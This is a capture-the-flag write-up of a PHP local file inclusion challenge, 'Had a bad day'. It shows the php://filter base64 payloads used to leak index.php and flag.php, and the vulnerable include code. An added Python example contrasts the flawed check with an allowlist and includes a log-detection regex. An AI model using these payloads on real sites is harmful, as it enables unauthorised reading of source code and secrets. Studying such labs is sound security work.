[BSidesCF 2020]Had a bad day

First, use the php://filter stream wrapper to read the source of index.php.
Construct: php://filter/read=convert.base64-encode/resource=index.php

An error message appears.

Dropping the .php suffix (the script appends it itself) lets the source be read; it comes back as a block of base64-encoded text.


Base64-decoding it yields the source; the relevant part:

```php
<?php
$file = $_GET['category'];

if(isset($file))
{
    // Substring checks only: the value merely has to contain "woofers" or "meowers"
    // (or "index" at an offset greater than 0, since this clause lacks !== false).
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    }
    else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
```

Use the include() call to try to include the flag.

Construct: index.php?category=woofers/../flag

Nothing comes back.
The php://filter wrapper lets us wrap another layer of protocol around the path and read flag.php.
Construct: php://filter/read=convert.base64-encode/woofers/resource=flag


Base64-decode the output to get the flag.
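As an added example that is not part of the original writeup, the following Python models the strpos() gate from the source above next to an exact-match allowlist, showing why both payloads used in the writeup pass the original check and fail the strict one; the allowed category names and the log-detection pattern are assumptions.

```python
import re

# Assumption: the two category pages the application actually serves.
ALLOWED_CATEGORIES = {"woofers", "meowers"}


def original_check(category: str) -> bool:
    """Model of the writeup's strpos()-based gate.

    strpos() returns false when the needle is absent, so the first two
    clauses are plain substring tests anywhere in the value. The third
    clause has no `!== false`, so it is truthy only when "index" occurs at
    an offset greater than 0 (offset 0 is the integer 0, which PHP treats
    as false).
    """
    return ("woofers" in category
            or "meowers" in category
            or category.find("index") > 0)


def strict_check(category: str) -> bool:
    """Hardened replacement: the value must equal a known category name.

    Substring or prefix checks cannot stop traversal or stream wrappers;
    only an exact match against an allowlist does.
    """
    return category in ALLOWED_CATEGORIES


def included_path(category: str) -> str:
    """What include($file . '.php') receives for a given category value."""
    return category + ".php"


# Assumption: a simple pattern for detection in access logs, matching a
# stream wrapper scheme at the start of the value or a ../ path segment.
_SUSPICIOUS = re.compile(r"^[a-z][a-z0-9+.\-]*://|(^|/)\.\./", re.IGNORECASE)


def is_suspicious(category: str) -> bool:
    """Flag category values carrying a wrapper scheme or directory traversal."""
    return _SUSPICIOUS.search(category) is not None


if __name__ == "__main__":
    for value in ("woofers", "woofers/../flag",
                  "php://filter/read=convert.base64-encode/woofers/resource=flag"):
        print(f"{value!r}: original={original_check(value)} "
              f"strict={strict_check(value)} suspicious={is_suspicious(value)}")
```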
